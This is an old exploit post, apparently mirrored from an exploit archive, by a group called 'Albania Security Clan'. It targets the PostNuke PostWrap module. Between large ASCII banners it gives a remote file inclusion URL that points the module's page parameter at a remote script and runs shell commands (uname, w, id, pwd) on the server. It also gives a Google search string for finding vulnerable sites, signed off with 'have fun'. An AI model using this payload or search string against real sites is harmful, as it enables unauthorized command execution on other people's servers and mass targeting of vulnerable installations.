id: 63
date: 02/08/2005
title: PostNuke PostWrap Module Remote Exploit
author: ALBANIA SECURITY
cves: 

=======================================
PostNuke PostWrap Module Remote Exploit
=======================================




".,-*'^'~*-,._.,-*'^'~*-,._.,-*'^'~*-,._.,-*'^'~*-,._.,-*'^'~*-,._.,-*'^'~*-,._."
".,-*-,._ -.,-*-,."
".,-*-,._ ALBANIA SECURITY CLAN -.,-*-,."
".,-*-,._ -.,-*-,."
".,-*-,._ ...::www.albanianhaxorz.org::... -.,-*-,."
".,-*-,.- -.,-*-,."
".,-*-,.- PROUD TO BE ALBANIAN -.,-*-,."
".,-*-,._ -.,-*-,."
".,-*-,._ Copyright (c) 2005 ASC irc.gigachat.net #ASC -.,-*-,."
".,-*-,._ -.,-*-,."
".,-*-,._.,-*-,._.,-*-,._.,-*-,._.,-*-,._.,-*-,._.,-*-,._.,-*-,._.,-*-,.-.,-*-,."
 
 
/index.php?module=PostWrap&page=http://localhost/asc?&cmd=uname%20-a;w;id;pwd
 
on google */index.php?module=PostWrap&page= ext:php have fun
 
 
 
".,-*'^'~*-,._.,-*'^'~*-,._.,-*'^'~*-,._.,-*'^'~*-,._.,-*'^'~*-,._.,-*'^'~*-,._."
".,-*-,._ -.,-*-,."
".,-*-,._ ALBANIA SECURITY CLAN -.,-*-,."
".,-*-,._ -.,-*-,."
".,-*-,._ ...::www.albanianhaxorz.org::... -.,-*-,."
".,-*-,.- -.,-*-,."
".,-*-,.- PROUD TO BE ALBANIAN -.,-*-,."
".,-*-,._ -.,-*-,."
".,-*-,._ Copyright (c) 2005 ASC irc.gigachat.net #ASC -.,-*-,."
".,-*-,._ -.,-*-,."
".,-*-,._.,-*-,._.,-*-,._.,-*-,._.,-*-,._.,-*-,._.,-*-,._.,-*-,._.,-*-,.-.,-*-,."



#  0day.today [2023-03-24]  #